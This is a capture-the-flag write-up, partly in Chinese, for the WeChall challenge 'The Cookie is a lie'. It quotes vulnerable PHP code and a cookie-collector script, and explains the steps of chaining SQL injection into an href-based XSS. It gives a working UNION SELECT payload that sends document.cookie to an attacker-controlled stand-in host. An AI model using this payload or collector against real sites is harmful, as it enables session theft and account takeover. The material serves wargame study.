WeChall - The Cookie is a lie

Challenge

The Cookie is a lie (Special)

You, Chell want to destroy GLaDOS. For this mission you have to steal the cookie from GLaDOS in order to get access to the mainframe in the Enrichment Center.

You have found a source code for a web application, which is vulnerable to sql-injection and xss attacks. This web application runs on the mainframe (accessible only from the internal network).

Bad news are that you can't access the mainframe without the cookie, only GLaDOS can. Another bad news are that the www-user has only read access on the mainframe database, and stacking the queries is not working.

You have read the protocols that if GLaDOS receives a new e-mail with an id in it, GLaDOS will visit the experience web application above, enter the id and click on the first link in order to gather information about the new experience subject.

Your mission is to send a special id to GLaDOS, in order to steal the cookie data. (*write Z a PM with the challenge title as subject)

Source Code Analysis

挑战提供两个 PHP 源码文件:

experience.php(主框架上的 Web 应用):

1
2
3
4
5
6
7
8
9
10
$id = $_GET['id'];
$id=str_replace('<','',$id);
$id=str_replace('>','',$id);
$id=str_replace(';','',$id);
$query= "SELECT * FROM experience WHERE id=".$id."";
$result = mysql_query($query) or die(mysql_error());
$row = mysql_fetch_array($result);
$filename = str_replace('<','',$row['filename']);
$filename = str_replace('>','',$filename);
echo '<a href='.$filename.'>Click here to view the file.</a>';
  • id 参数无引号拼接 → SQL 注入
  • $filename 直接进入 <a href=$filename>XSS (href 注入)
  • 过滤:<, >, ; 被删除
  • magic_quotes_gpc 已关闭,引号可用

steal_cookie.php(测试服务器上的 cookie 收集器):

1
2
3
4
$cookie=$_GET['cookie'] . "\n";
$fh=fopen('evil.txt','ab');
fwrite($fh,$cookie);
fclose($fh);

表结构(论坛确认):experience 表有 2 列:id (int), filename (varchar(500))。

攻击链

  1. 构造 SQL 注入 payload,使用 UNION SELECT 控制 filename 字段
  2. filename 设为 javascript: 协议 URL,读取 document.cookie 并发送到 steal_cookie.php
  3. PM 给 Z,主题 "The Cookie is a lie",消息体为 SQLi payload
  4. GLaDOS bot 读取 PM → 访问 experience.php → 输入 ID → 点击第一个链接
  5. cookie 被发送到 http://test.cake/steal_cookie.php?cookie=...
  6. 从 evil.txt 读取 cookie → 提交解

Payload(2 列 UNION SELECT):

1
1 UNION SELECT 1,"javascript:document.location='http://test.cake/steal_cookie.php?cookie='+document.cookie"

阻塞原因

GLaDOS bot 已失效。和 Fix Us 同样的问题——Z 的自动化 bot 早在 2012 年就已停止运行。

解题历史佐证

查看 challenge solvers 页面,解题时间线如下:

  • 2008-09-20: Visualq, Z (首批)
  • 2008-09-20 ~ 2012-11-09: 陆续 71 人解出
  • 2012-11-09: 最后一人解出
  • 2012-11-09 ~ 至今 (13年+): 零人解题

参考

  • https://www.wechall.net/en/challenge/Z/cookie_is_a_lie/index.php
  • http://www.wechall.net/forum-t102/Challenge_The_Cookie_is_a_lie.html